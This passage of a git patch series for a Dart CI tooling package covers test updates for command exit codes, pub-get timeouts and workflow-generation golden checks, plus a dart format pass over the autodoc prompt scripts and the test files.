capturedSummary; + TestResultsUtil.writeTestJobSummary( + results, + 0, + platformId: 'test-runner', + writeSummary: (m) => capturedSummary = m, + ); + expect(capturedSummary, isNotNull); + expect(capturedSummary!, contains('## Test Results — test-runner')); + expect(capturedSummary!, contains('passed')); + } + }, + ); + + test('exits with code 1 when root tests fail', () async { + writeRootPubspec(includeTest: true); + Directory(p.join(tempDir.path, 'test')).createSync(recursive: true); + File(p.join(tempDir.path, 'test', 'failing_test.dart')).writeAsStringSync( + ''' +import 'package:test/test.dart'; + +void main() { + test('fails', () => expect(1, equals(2))); +} +''', + ); + + final pubGet = await Process.run('dart', [ + 'pub', + 'get', + ], workingDirectory: tempDir.path); + expect(pubGet.exitCode, equals(0), reason: 'dart pub get must succeed'); + + await expectLater( + () => TestCommand.runWithRoot(tempDir.path, exitHandler: _throwingExit), + throwsA(isA<_TestExit>().having((e) => e.code, 'code', 1)), + ); + }); + + test( + 'exits when configured sub-package directory has no pubspec.yaml', + () async { + writeRootPubspec(); + writeSubPackageConfig([ + {'name': 'pkg_a', 'path': 'packages/pkg_a'}, + ]); + Directory( + p.join(tempDir.path, 'packages', 'pkg_a'), + ).createSync(recursive: true); + + await expectLater( + () => + TestCommand.runWithRoot(tempDir.path, exitHandler: _throwingExit), + throwsA(isA<_TestExit>().having((e) => e.code, 'code', 1)), + ); + }, + ); + + test('exits when sub-package pub get times out', () async { + writeRootPubspec(); + writeSubPackageConfig([ + {'name': 'pkg_timeout', 'path': 'packages/pkg_timeout'}, + ]); + final pkgDir = Directory(p.join(tempDir.path, 'packages', 'pkg_timeout')) + ..createSync(recursive: true); + File(p.join(pkgDir.path, 'pubspec.yaml')).writeAsStringSync(''' +name: pkg_timeout version: 0.0.0 environment: sdk: ^3.0.0 dev_dependencies: test: ^1.24.0 '''); - Directory(p.join(tempDir.path, 
'test')).createSync(recursive: true); - File(p.join(tempDir.path, 'test', 'passing_test.dart')).writeAsStringSync(''' + Directory(p.join(pkgDir.path, 'test')).createSync(recursive: true); + File(p.join(pkgDir.path, 'test', 'noop_test.dart')).writeAsStringSync(''' import 'package:test/test.dart'; void main() { - test('passes', () => expect(1 + 1, equals(2))); + test('noop', () => expect(true, isTrue)); } '''); - // Resolve dependencies so dart test can run - final pubGet = await Process.run('dart', ['pub', 'get'], workingDirectory: tempDir.path); - expect(pubGet.exitCode, equals(0), reason: 'dart pub get must succeed'); - await TestCommand.runWithRoot(tempDir.path); - - final logDir = p.join(tempDir.path, '.dart_tool', 'test-logs'); - expect(Directory(logDir).existsSync(), isTrue, reason: 'log dir should be created'); - - // results.json or expanded.txt are written by file reporters - final jsonPath = p.join(logDir, 'results.json'); - final expandedPath = p.join(logDir, 'expanded.txt'); - final hasResults = File(jsonPath).existsSync() || File(expandedPath).existsSync(); - expect(hasResults, isTrue, reason: 'at least one reporter output should exist'); - - // If results.json exists, verify parse + writeTestJobSummary pathway - if (File(jsonPath).existsSync()) { - final results = TestResultsUtil.parseTestResultsJson(jsonPath); - expect(results.parsed, isTrue); - expect(results.passed, greaterThanOrEqualTo(1)); - expect(results.failed, equals(0)); - - String? 
capturedSummary; - TestResultsUtil.writeTestJobSummary( - results, - 0, - platformId: 'test-runner', - writeSummary: (m) => capturedSummary = m, - ); - expect(capturedSummary, isNotNull); - expect(capturedSummary!, contains('## Test Results — test-runner')); - expect(capturedSummary!, contains('passed')); - } + await expectLater( + () => TestCommand.runWithRoot( + tempDir.path, + pubGetTimeout: Duration.zero, + exitHandler: _throwingExit, + ), + throwsA(isA<_TestExit>().having((e) => e.code, 'code', 1)), + ); }); }); } From b7116486be19a5528169fb83baf84f5e0ad90d09 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 22:34:28 -0500 Subject: [PATCH 15/16] test: broaden workflow generator validation assertions Expand workflow generator coverage for new validation and render behaviors, including retention-days configuration, GH_PAT env indirection, single-platform IDs, and user-section preservation edge cases. --- test/workflow_generator_test.dart | 37 +++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) diff --git a/test/workflow_generator_test.dart b/test/workflow_generator_test.dart index f91f04c..0f60482 100644 --- a/test/workflow_generator_test.dart +++ b/test/workflow_generator_test.dart @@ -31,6 +31,19 @@ Map _validConfig({ }; } +String _readToolingVersionFromPubspec() { + final pubspec = File('pubspec.yaml'); + if (!pubspec.existsSync()) { + throw StateError('pubspec.yaml not found in current working directory'); + } + final content = pubspec.readAsStringSync(); + final match = RegExp(r'^version:\s*([^\s]+)\s*$', multiLine: true).firstMatch(content); + if (match == null) { + throw StateError('Could not parse version from pubspec.yaml'); + } + return match.group(1)!; +} + void main() { // =========================================================================== // P0: validate() tests @@ -1372,6 +1385,30 @@ void main() { expect('${firstStep['uses']}', contains('actions/checkout')); }); + test('rendered workflow stays in sync with 
committed .github/workflows/ci.yaml', () { + final ciConfig = WorkflowGenerator.loadCiConfig(Directory.current.path); + expect(ciConfig, isNotNull, reason: 'Repository CI config must be present'); + + final goldenPath = '.github/workflows/ci.yaml'; + final goldenFile = File(goldenPath); + expect(goldenFile.existsSync(), isTrue, reason: 'Committed workflow golden must exist'); + + final existingContent = goldenFile.readAsStringSync(); + final toolingVersion = _readToolingVersionFromPubspec(); + final rendered = WorkflowGenerator( + ciConfig: ciConfig!, + toolingVersion: toolingVersion, + ).render(existingContent: existingContent); + + String normalize(String input) => '${input.replaceAll('\r\n', '\n').trimRight()}\n'; + + expect( + normalize(rendered), + equals(normalize(existingContent)), + reason: 'Generated workflow drifted from committed file. Re-run workflow generation and commit updated output.', + ); + }); + test('managed_test: upload step uses success() || failure() not cancelled', () { final gen = WorkflowGenerator( ciConfig: _minimalValidConfig(featureOverrides: {'managed_test': true}), From dcae6c2147822a2ca97d4224848c0486b5ee5f3d Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Wed, 25 Feb 2026 04:27:54 +0000 Subject: [PATCH 16/16] bot(format): apply dart format --line-length 120 [skip ci] --- .../prompts/autodoc_api_reference_prompt.dart | 10 +- scripts/prompts/autodoc_examples_prompt.dart | 29 +- scripts/prompts/autodoc_migration_prompt.dart | 24 +- .../prompts/autodoc_quickstart_prompt.dart | 22 +- test/cli_utils_test.dart | 318 ++++++------------ test/test_command_test.dart | 167 ++++----- 6 files changed, 189 insertions(+), 381 deletions(-) diff --git a/scripts/prompts/autodoc_api_reference_prompt.dart b/scripts/prompts/autodoc_api_reference_prompt.dart index c044b4e..a0d1bfe 100644 --- a/scripts/prompts/autodoc_api_reference_prompt.dart +++ 
b/scripts/prompts/autodoc_api_reference_prompt.dart @@ -9,9 +9,7 @@ import 'dart:io'; void main(List args) { if (args.length < 2) { - stderr.writeln( - 'Usage: autodoc_api_reference_prompt.dart [lib_dir]', - ); + stderr.writeln('Usage: autodoc_api_reference_prompt.dart [lib_dir]'); exit(1); } @@ -78,11 +76,7 @@ Generate the complete API_REFERENCE.md content. String _runSync(String command) { try { - final result = Process.runSync( - 'sh', - ['-c', command], - workingDirectory: Directory.current.path, - ); + final result = Process.runSync('sh', ['-c', command], workingDirectory: Directory.current.path); if (result.exitCode == 0) return (result.stdout as String).trim(); return ''; } catch (_) { diff --git a/scripts/prompts/autodoc_examples_prompt.dart b/scripts/prompts/autodoc_examples_prompt.dart index 39e8e22..6509399 100644 --- a/scripts/prompts/autodoc_examples_prompt.dart +++ b/scripts/prompts/autodoc_examples_prompt.dart @@ -9,9 +9,7 @@ import 'dart:io'; void main(List args) { if (args.length < 2) { - stderr.writeln( - 'Usage: autodoc_examples_prompt.dart [lib_dir]', - ); + stderr.writeln('Usage: autodoc_examples_prompt.dart [lib_dir]'); exit(1); } @@ -19,30 +17,19 @@ void main(List args) { final sourceDir = args[1]; final libDir = args.length > 2 ? args[2] : ''; - final classes = _runSync( - 'grep -rn "^class\\|^abstract class\\|^mixin" $sourceDir 2>/dev/null | head -30', - ); + final classes = _runSync('grep -rn "^class\\|^abstract class\\|^mixin" $sourceDir 2>/dev/null | head -30'); final methods = _runSync( 'grep -rn "Future<\\|Stream<\\|void " $sourceDir 2>/dev/null | grep -v "^\\/\\/" | head -30', ); - final enums = _runSync( - 'grep -rn "^enum" $sourceDir 2>/dev/null', - ); + final enums = _runSync('grep -rn "^enum" $sourceDir 2>/dev/null'); String testContent = '(no tests found)'; final testDir = libDir.isNotEmpty ? 
libDir.replaceFirst('lib/', 'test/') : ''; if (testDir.isNotEmpty && Directory(testDir).existsSync()) { - testContent = _truncate( - _runSync( - 'find $testDir -name "*_test.dart" -exec head -50 {} \\; 2>/dev/null', - ), - 10000, - ); + testContent = _truncate(_runSync('find $testDir -name "*_test.dart" -exec head -50 {} \\; 2>/dev/null'), 10000); } - final commands = _runSync( - 'grep -rn "extends Command" $sourceDir 2>/dev/null | head -20', - ); + final commands = _runSync('grep -rn "extends Command" $sourceDir 2>/dev/null | head -20'); print(''' You are writing practical code examples for the **$moduleName** module. @@ -100,11 +87,7 @@ Generate the complete EXAMPLES.md content. String _runSync(String command) { try { - final result = Process.runSync( - 'sh', - ['-c', command], - workingDirectory: Directory.current.path, - ); + final result = Process.runSync('sh', ['-c', command], workingDirectory: Directory.current.path); if (result.exitCode == 0) return (result.stdout as String).trim(); return ''; } catch (_) { diff --git a/scripts/prompts/autodoc_migration_prompt.dart b/scripts/prompts/autodoc_migration_prompt.dart index a8da0ab..e4bb316 100644 --- a/scripts/prompts/autodoc_migration_prompt.dart +++ b/scripts/prompts/autodoc_migration_prompt.dart @@ -9,9 +9,7 @@ import 'dart:io'; void main(List args) { if (args.length < 2) { - stderr.writeln( - 'Usage: autodoc_migration_prompt.dart [prev_hash]', - ); + stderr.writeln('Usage: autodoc_migration_prompt.dart [prev_hash]'); exit(1); } @@ -22,24 +20,16 @@ void main(List args) { // Get diff of Dart source files String sourceDiff; if (prevHash.isNotEmpty) { - sourceDiff = _truncate( - _runSync('git diff $prevHash..HEAD -- $sourceDir'), - 30000, - ); + sourceDiff = _truncate(_runSync('git diff $prevHash..HEAD -- $sourceDir'), 30000); } else { // No previous hash, show recent changes - sourceDiff = _truncate( - _runSync('git log --oneline -20 -- $sourceDir'), - 5000, - ); + sourceDiff = _truncate(_runSync('git log 
--oneline -20 -- $sourceDir'), 5000); } // Get list of changed files final changedFiles = prevHash.isNotEmpty ? _runSync('git diff --name-only $prevHash..HEAD -- $sourceDir') - : _runSync( - 'git log --oneline --name-only -10 -- $sourceDir | grep ".dart"', - ); + : _runSync('git log --oneline --name-only -10 -- $sourceDir | grep ".dart"'); // Get added/removed classes, mixins, extensions, enums final addedDefinitions = prevHash.isNotEmpty @@ -105,11 +95,7 @@ Generate the complete MIGRATION.md content. String _runSync(String command) { try { - final result = Process.runSync( - 'sh', - ['-c', command], - workingDirectory: Directory.current.path, - ); + final result = Process.runSync('sh', ['-c', command], workingDirectory: Directory.current.path); if (result.exitCode == 0) return (result.stdout as String).trim(); return ''; } catch (_) { diff --git a/scripts/prompts/autodoc_quickstart_prompt.dart b/scripts/prompts/autodoc_quickstart_prompt.dart index 84d65f8..5d9103c 100644 --- a/scripts/prompts/autodoc_quickstart_prompt.dart +++ b/scripts/prompts/autodoc_quickstart_prompt.dart @@ -9,9 +9,7 @@ import 'dart:io'; void main(List args) { if (args.length < 2) { - stderr.writeln( - 'Usage: autodoc_quickstart_prompt.dart [lib_dir]', - ); + stderr.writeln('Usage: autodoc_quickstart_prompt.dart [lib_dir]'); exit(1); } @@ -28,22 +26,16 @@ void main(List args) { final firstDart = _runSync( 'find $sourceDir -name "*.dart" -not -name "*.g.dart" -not -name "*.pb.dart" -not -name "*.pbenum.dart" -not -name "*.pbjson.dart" -not -name "*.pbgrpc.dart" -type f 2>/dev/null | head -1', ); - final dartPreview = firstDart.isNotEmpty - ? _truncate(_runSync('cat "$firstDart"'), 15000) - : '(no Dart files)'; + final dartPreview = firstDart.isNotEmpty ? 
_truncate(_runSync('cat "$firstDart"'), 15000) : '(no Dart files)'; final classes = _runSync( 'grep -rn "^class\\|^abstract class\\|^mixin\\|^extension" $sourceDir 2>/dev/null | head -30', ); - final exports = _runSync( - 'grep -rn "^export" $sourceDir 2>/dev/null | head -20', - ); + final exports = _runSync('grep -rn "^export" $sourceDir 2>/dev/null | head -20'); String libTree = '(same as source)'; if (libDir.isNotEmpty && libDir != sourceDir && Directory(libDir).existsSync()) { - libTree = _runSync( - 'tree $libDir -L 2 --dirsfirst -I "*.g.dart" 2>/dev/null || echo "(no tree)"', - ); + libTree = _runSync('tree $libDir -L 2 --dirsfirst -I "*.g.dart" 2>/dev/null || echo "(no tree)"'); } print(''' @@ -120,11 +112,7 @@ Generate the complete QUICKSTART.md content. String _runSync(String command) { try { - final result = Process.runSync( - 'sh', - ['-c', command], - workingDirectory: Directory.current.path, - ); + final result = Process.runSync('sh', ['-c', command], workingDirectory: Directory.current.path); if (result.exitCode == 0) return (result.stdout as String).trim(); return '(command failed)'; } catch (_) { diff --git a/test/cli_utils_test.dart b/test/cli_utils_test.dart index bab5f1c..d1fe25d 100644 --- a/test/cli_utils_test.dart +++ b/test/cli_utils_test.dart @@ -47,10 +47,7 @@ void main() { }); test('returns default path when TEST_LOG_DIR is unset', () { - final resolved = RepoUtils.resolveTestLogDir( - repoRoot, - environment: const {}, - ); + final resolved = RepoUtils.resolveTestLogDir(repoRoot, environment: const {}); expect(resolved, equals(p.join(repoRoot, '.dart_tool', 'test-logs'))); }); @@ -74,10 +71,8 @@ void main() { test('throws when TEST_LOG_DIR is relative', () { expect( - () => RepoUtils.resolveTestLogDir( - repoRoot, - environment: const {'TEST_LOG_DIR': 'relative/path'}, - ), + () => + RepoUtils.resolveTestLogDir(repoRoot, environment: const {'TEST_LOG_DIR': 'relative/path'}), throwsA(isA()), ); }); @@ -86,10 +81,7 @@ void main() { final 
runnerTemp = p.join(repoRoot, 'runner-temp'); final outside = p.join(repoRoot, 'outside', 'logs'); expect( - () => RepoUtils.resolveTestLogDir( - repoRoot, - environment: {'RUNNER_TEMP': runnerTemp, 'TEST_LOG_DIR': outside}, - ), + () => RepoUtils.resolveTestLogDir(repoRoot, environment: {'RUNNER_TEMP': runnerTemp, 'TEST_LOG_DIR': outside}), throwsA(isA()), ); }); @@ -109,10 +101,7 @@ void main() { expect( () => RepoUtils.resolveTestLogDir( repoRoot, - environment: { - 'RUNNER_TEMP': '/tmp/runner\nbad', - 'TEST_LOG_DIR': inside, - }, + environment: {'RUNNER_TEMP': '/tmp/runner\nbad', 'TEST_LOG_DIR': inside}, ), throwsA(isA()), ); @@ -152,35 +141,19 @@ void main() { expect(File(filePath).readAsStringSync(), equals('hello world')); }); - test( - 'ensureSafeDirectory rejects symlink-backed directories', - skip: !symlinksSupported, - () { - final targetDir = Directory(p.join(tempDir.path, 'target')) - ..createSync(recursive: true); - final linkDirPath = p.join(tempDir.path, 'linked'); - Link(linkDirPath).createSync(targetDir.path); - expect( - () => RepoUtils.ensureSafeDirectory(linkDirPath), - throwsA(isA()), - ); - }, - ); - - test( - 'writeFileSafely rejects symlink file targets', - skip: !symlinksSupported, - () { - final targetFile = File(p.join(tempDir.path, 'target.txt')) - ..writeAsStringSync('base'); - final linkPath = p.join(tempDir.path, 'linked.txt'); - Link(linkPath).createSync(targetFile.path); - expect( - () => RepoUtils.writeFileSafely(linkPath, 'new content'), - throwsA(isA()), - ); - }, - ); + test('ensureSafeDirectory rejects symlink-backed directories', skip: !symlinksSupported, () { + final targetDir = Directory(p.join(tempDir.path, 'target'))..createSync(recursive: true); + final linkDirPath = p.join(tempDir.path, 'linked'); + Link(linkDirPath).createSync(targetDir.path); + expect(() => RepoUtils.ensureSafeDirectory(linkDirPath), throwsA(isA())); + }); + + test('writeFileSafely rejects symlink file targets', skip: !symlinksSupported, () { + final 
targetFile = File(p.join(tempDir.path, 'target.txt'))..writeAsStringSync('base'); + final linkPath = p.join(tempDir.path, 'linked.txt'); + Link(linkPath).createSync(targetFile.path); + expect(() => RepoUtils.writeFileSafely(linkPath, 'new content'), throwsA(isA())); + }); }); group('TestResultsUtil.parseTestResultsJson', () { @@ -217,35 +190,27 @@ void main() { expect(results.failures, isEmpty); }); - test( - 'returns unparsed results when NDJSON file has only blank lines', - () async { - final jsonPath = p.join(tempDir.path, 'blank.json'); - File(jsonPath).writeAsStringSync('\n \n\t\n'); - final results = await TestResultsUtil.parseTestResultsJson(jsonPath); - expect(results.parsed, isFalse); - expect(results.passed, equals(0)); - expect(results.failed, equals(0)); - expect(results.skipped, equals(0)); - expect(results.failures, isEmpty); - }, - ); - - test( - 'returns unparsed results when file has valid JSON but no structured events', - () async { - final jsonPath = p.join(tempDir.path, 'no_events.json'); - File( - jsonPath, - ).writeAsStringSync('{"type":"unknown","data":1}\n{"other":"value"}\n'); - final results = await TestResultsUtil.parseTestResultsJson(jsonPath); - expect(results.parsed, isFalse); - expect(results.passed, equals(0)); - expect(results.failed, equals(0)); - expect(results.skipped, equals(0)); - expect(results.failures, isEmpty); - }, - ); + test('returns unparsed results when NDJSON file has only blank lines', () async { + final jsonPath = p.join(tempDir.path, 'blank.json'); + File(jsonPath).writeAsStringSync('\n \n\t\n'); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isFalse); + expect(results.passed, equals(0)); + expect(results.failed, equals(0)); + expect(results.skipped, equals(0)); + expect(results.failures, isEmpty); + }); + + test('returns unparsed results when file has valid JSON but no structured events', () async { + final jsonPath = p.join(tempDir.path, 'no_events.json'); + 
File(jsonPath).writeAsStringSync('{"type":"unknown","data":1}\n{"other":"value"}\n'); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isFalse); + expect(results.passed, equals(0)); + expect(results.failed, equals(0)); + expect(results.skipped, equals(0)); + expect(results.failures, isEmpty); + }); test('parses pass/fail/skipped counts and failure details', () async { final jsonPath = p.join(tempDir.path, 'results.json'); @@ -375,12 +340,7 @@ void main() { }); group('TestResultsUtil.writeTestJobSummary', () { - TestResults _parsed({ - required int passed, - required int failed, - required int skipped, - int durationMs = 500, - }) { + TestResults _parsed({required int passed, required int failed, required int skipped, int durationMs = 500}) { final results = TestResults() ..parsed = true ..passed = passed @@ -390,50 +350,39 @@ void main() { return results; } - test( - 'emits NOTE when parsed results are successful and exit code is 0', - () { - String? summary; - final results = _parsed(passed: 3, failed: 0, skipped: 1); - - TestResultsUtil.writeTestJobSummary( - results, - 0, - platformId: 'linux-x64', - writeSummary: (markdown) => summary = markdown, - ); + test('emits NOTE when parsed results are successful and exit code is 0', () { + String? summary; + final results = _parsed(passed: 3, failed: 0, skipped: 1); - expect(summary, isNotNull); - expect(summary!, contains('## Test Results — linux-x64')); - expect(summary!, contains('> [!NOTE]')); - expect(summary!, contains('All 4 tests passed')); - }, - ); - - test( - 'emits CAUTION when exit code is non-zero even if failed count is zero', - () { - String? 
summary; - final results = _parsed(passed: 2, failed: 0, skipped: 0); - - TestResultsUtil.writeTestJobSummary( - results, - 1, - platformId: 'linux ', - writeSummary: (markdown) => summary = markdown, - ); + TestResultsUtil.writeTestJobSummary( + results, + 0, + platformId: 'linux-x64', + writeSummary: (markdown) => summary = markdown, + ); - expect(summary, isNotNull); - expect(summary!, contains('## Test Results — linux <x64>')); - expect(summary!, contains('> [!CAUTION]')); - expect( - summary!, - contains( - 'Tests exited with code 1 despite no structured test failures.', - ), - ); - }, - ); + expect(summary, isNotNull); + expect(summary!, contains('## Test Results — linux-x64')); + expect(summary!, contains('> [!NOTE]')); + expect(summary!, contains('All 4 tests passed')); + }); + + test('emits CAUTION when exit code is non-zero even if failed count is zero', () { + String? summary; + final results = _parsed(passed: 2, failed: 0, skipped: 0); + + TestResultsUtil.writeTestJobSummary( + results, + 1, + platformId: 'linux ', + writeSummary: (markdown) => summary = markdown, + ); + + expect(summary, isNotNull); + expect(summary!, contains('## Test Results — linux <x64>')); + expect(summary!, contains('> [!CAUTION]')); + expect(summary!, contains('Tests exited with code 1 despite no structured test failures.')); + }); test('emits CAUTION for unparsed results with non-zero exit code', () { String? 
summary; @@ -448,12 +397,7 @@ void main() { expect(summary, isNotNull); expect(summary!, contains('> [!CAUTION]')); - expect( - summary!, - contains( - 'Tests failed (exit code 7) — no structured results available.', - ), - ); + expect(summary!, contains('Tests failed (exit code 7) — no structured results available.')); }); test('emits NOTE for unparsed results with zero exit code', () { @@ -469,25 +413,14 @@ void main() { expect(summary, isNotNull); expect(summary!, contains('> [!NOTE]')); - expect( - summary!, - contains( - 'Tests passed (exit code 0) — no structured results available.', - ), - ); + expect(summary!, contains('Tests passed (exit code 0) — no structured results available.')); }); test('emits CAUTION when parsed results contain failures', () { String? summary; final results = _parsed(passed: 1, failed: 1, skipped: 0); results.failures.add( - TestFailure( - name: 'failing test', - error: 'boom', - stackTrace: 'trace', - printOutput: '', - durationMs: 12, - ), + TestFailure(name: 'failing test', error: 'boom', stackTrace: 'trace', printOutput: '', durationMs: 12), ); TestResultsUtil.writeTestJobSummary( @@ -527,12 +460,7 @@ void main() { ); expect(summary, isNotNull); - expect( - summary!, - contains( - '_...and 5 more failures. See test logs artifact for full details._', - ), - ); + expect(summary!, contains('_...and 5 more failures. 
See test logs artifact for full details._')); expect(summary!, isNot(contains('failing test 24'))); }); @@ -592,10 +520,7 @@ void main() { group('Utf8BoundedBuffer', () { test('appends full content when under byte limit', () { - final buffer = Utf8BoundedBuffer( - maxBytes: 20, - truncationSuffix: '...[truncated]', - ); + final buffer = Utf8BoundedBuffer(maxBytes: 20, truncationSuffix: '...[truncated]'); buffer.append('hello'); buffer.append(' world'); expect(buffer.isTruncated, isFalse); @@ -612,18 +537,12 @@ void main() { expect(buffer.byteLength, equals(9)); }); - test( - 'never exceeds maxBytes even when suffix is longer than remaining budget', - () { - final buffer = Utf8BoundedBuffer( - maxBytes: 4, - truncationSuffix: '...[truncated]', - ); - buffer.append('abcdefgh'); - expect(buffer.isTruncated, isTrue); - expect(utf8.encode(buffer.toString()).length, lessThanOrEqualTo(4)); - }, - ); + test('never exceeds maxBytes even when suffix is longer than remaining budget', () { + final buffer = Utf8BoundedBuffer(maxBytes: 4, truncationSuffix: '...[truncated]'); + buffer.append('abcdefgh'); + expect(buffer.isTruncated, isTrue); + expect(utf8.encode(buffer.toString()).length, lessThanOrEqualTo(4)); + }); }); group('StepSummary', () { @@ -640,10 +559,7 @@ void main() { File(summaryPath).writeAsStringSync('x' * (maxBytes - 2)); expect(File(summaryPath).lengthSync(), equals(maxBytes - 2)); - StepSummary.write( - '語', - environment: {'GITHUB_STEP_SUMMARY': summaryPath}, - ); + StepSummary.write('語', environment: {'GITHUB_STEP_SUMMARY': summaryPath}); // Should skip append (would exceed); file size unchanged expect(File(summaryPath).lengthSync(), equals(maxBytes - 2)); } finally { @@ -679,9 +595,7 @@ void main() { void _writeConfig(Map ci) { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File( - '${configDir.path}/config.json', - ).writeAsStringSync(json.encode({'ci': ci})); + 
File('${configDir.path}/config.json').writeAsStringSync(json.encode({'ci': ci})); } test('returns empty when no sub_packages', () { @@ -771,55 +685,35 @@ void main() { }); group('CiProcessRunner.exec', () { - test( - 'fatal path exits with process exit code after flushing stdout/stderr', - () async { - final scriptPath = p.join( - p.current, - 'test', - 'scripts', - 'fatal_exit_probe.dart', - ); - final result = Process.runSync(Platform.resolvedExecutable, [ - 'run', - scriptPath, - ], runInShell: false); - final expectedCode = Platform.isWindows ? 7 : 1; - expect( - result.exitCode, - equals(expectedCode), - reason: 'fatal exec should exit with failing command exit code', - ); - }, - ); + test('fatal path exits with process exit code after flushing stdout/stderr', () async { + final scriptPath = p.join(p.current, 'test', 'scripts', 'fatal_exit_probe.dart'); + final result = Process.runSync(Platform.resolvedExecutable, ['run', scriptPath], runInShell: false); + final expectedCode = Platform.isWindows ? 7 : 1; + expect(result.exitCode, equals(expectedCode), reason: 'fatal exec should exit with failing command exit code'); + }); }); group('CiProcessRunner.runWithTimeout', () { test('completes normally when process finishes within timeout', () async { - final result = await CiProcessRunner.runWithTimeout( - Platform.resolvedExecutable, - ['--version'], - timeout: const Duration(seconds: 10), - ); + final result = await CiProcessRunner.runWithTimeout(Platform.resolvedExecutable, [ + '--version', + ], timeout: const Duration(seconds: 10)); expect(result.exitCode, equals(0)); expect(result.stdout, contains('Dart')); }); - test( - 'returns timeout result and kills process when timeout exceeded', - () async { - final executable = Platform.isWindows ? 'ping' : 'sleep'; - final args = Platform.isWindows ? 
['127.0.0.1', '-n', '60'] : ['60']; - final result = await CiProcessRunner.runWithTimeout( - executable, - args, - timeout: const Duration(milliseconds: 500), - timeoutExitCode: 124, - timeoutMessage: 'Timed out', - ); - expect(result.exitCode, equals(124)); - expect(result.stderr, equals('Timed out')); - }, - ); + test('returns timeout result and kills process when timeout exceeded', () async { + final executable = Platform.isWindows ? 'ping' : 'sleep'; + final args = Platform.isWindows ? ['127.0.0.1', '-n', '60'] : ['60']; + final result = await CiProcessRunner.runWithTimeout( + executable, + args, + timeout: const Duration(milliseconds: 500), + timeoutExitCode: 124, + timeoutMessage: 'Timed out', + ); + expect(result.exitCode, equals(124)); + expect(result.stderr, equals('Timed out')); + }); }); } diff --git a/test/test_command_test.dart b/test/test_command_test.dart index eb50d93..88b4ff4 100644 --- a/test/test_command_test.dart +++ b/test/test_command_test.dart @@ -33,14 +33,13 @@ void main() { void writeRootPubspec({bool includeTest = false}) { final deps = includeTest ? 
'dev_dependencies:\n test: ^1.24.0\n' : ''; - File(p.join(tempDir.path, 'pubspec.yaml')).writeAsStringSync( - 'name: ${config.repoName}\nversion: 0.0.0\nenvironment:\n sdk: ^3.0.0\n$deps', - ); + File( + p.join(tempDir.path, 'pubspec.yaml'), + ).writeAsStringSync('name: ${config.repoName}\nversion: 0.0.0\nenvironment:\n sdk: ^3.0.0\n$deps'); } void writeSubPackageConfig(List> subPackages) { - final configDir = Directory(p.join(tempDir.path, '.runtime_ci')) - ..createSync(recursive: true); + final configDir = Directory(p.join(tempDir.path, '.runtime_ci'))..createSync(recursive: true); File(p.join(configDir.path, 'config.json')).writeAsStringSync( jsonEncode({ 'ci': { @@ -52,17 +51,14 @@ void main() { ); } - test( - 'skips root tests and succeeds when no test/ directory exists', - () async { - // Minimal repo: pubspec with matching name, no test/ - writeRootPubspec(); + test('skips root tests and succeeds when no test/ directory exists', () async { + // Minimal repo: pubspec with matching name, no test/ + writeRootPubspec(); - // Completes without throwing or exit(1); StepSummary.write is no-op when - // GITHUB_STEP_SUMMARY is unset (local runs). - await TestCommand.runWithRoot(tempDir.path); - }, - ); + // Completes without throwing or exit(1); StepSummary.write is no-op when + // GITHUB_STEP_SUMMARY is unset (local runs). 
+ await TestCommand.runWithRoot(tempDir.path); + }); test('uses passed repoRoot for log directory resolution', () async { // Create minimal repo @@ -75,86 +71,64 @@ void main() { expect(Directory(expectedLogDir).existsSync(), isTrue); }); - test( - 'runs root tests, writes results.json, and StepSummary pathway produces valid output', - () async { - // Minimal repo with a passing test to exercise full TestCommand flow - writeRootPubspec(includeTest: true); - Directory(p.join(tempDir.path, 'test')).createSync(recursive: true); - File( - p.join(tempDir.path, 'test', 'passing_test.dart'), - ).writeAsStringSync(''' + test('runs root tests, writes results.json, and StepSummary pathway produces valid output', () async { + // Minimal repo with a passing test to exercise full TestCommand flow + writeRootPubspec(includeTest: true); + Directory(p.join(tempDir.path, 'test')).createSync(recursive: true); + File(p.join(tempDir.path, 'test', 'passing_test.dart')).writeAsStringSync(''' import 'package:test/test.dart'; void main() { test('passes', () => expect(1 + 1, equals(2))); } '''); - // Resolve dependencies so dart test can run - final pubGet = await Process.run('dart', [ - 'pub', - 'get', - ], workingDirectory: tempDir.path); - expect(pubGet.exitCode, equals(0), reason: 'dart pub get must succeed'); - - await TestCommand.runWithRoot(tempDir.path); - - final logDir = p.join(tempDir.path, '.dart_tool', 'test-logs'); - expect( - Directory(logDir).existsSync(), - isTrue, - reason: 'log dir should be created', - ); + // Resolve dependencies so dart test can run + final pubGet = await Process.run('dart', ['pub', 'get'], workingDirectory: tempDir.path); + expect(pubGet.exitCode, equals(0), reason: 'dart pub get must succeed'); - // results.json or expanded.txt are written by file reporters - final jsonPath = p.join(logDir, 'results.json'); - final expandedPath = p.join(logDir, 'expanded.txt'); - final hasResults = - File(jsonPath).existsSync() || File(expandedPath).existsSync(); - 
expect( - hasResults, - isTrue, - reason: 'at least one reporter output should exist', - ); + await TestCommand.runWithRoot(tempDir.path); - // If results.json exists, verify parse + writeTestJobSummary pathway - if (File(jsonPath).existsSync()) { - final results = await TestResultsUtil.parseTestResultsJson(jsonPath); - expect(results.parsed, isTrue); - expect(results.passed, greaterThanOrEqualTo(1)); - expect(results.failed, equals(0)); - - String? capturedSummary; - TestResultsUtil.writeTestJobSummary( - results, - 0, - platformId: 'test-runner', - writeSummary: (m) => capturedSummary = m, - ); - expect(capturedSummary, isNotNull); - expect(capturedSummary!, contains('## Test Results — test-runner')); - expect(capturedSummary!, contains('passed')); - } - }, - ); + final logDir = p.join(tempDir.path, '.dart_tool', 'test-logs'); + expect(Directory(logDir).existsSync(), isTrue, reason: 'log dir should be created'); + + // results.json or expanded.txt are written by file reporters + final jsonPath = p.join(logDir, 'results.json'); + final expandedPath = p.join(logDir, 'expanded.txt'); + final hasResults = File(jsonPath).existsSync() || File(expandedPath).existsSync(); + expect(hasResults, isTrue, reason: 'at least one reporter output should exist'); + + // If results.json exists, verify parse + writeTestJobSummary pathway + if (File(jsonPath).existsSync()) { + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isTrue); + expect(results.passed, greaterThanOrEqualTo(1)); + expect(results.failed, equals(0)); + + String? 
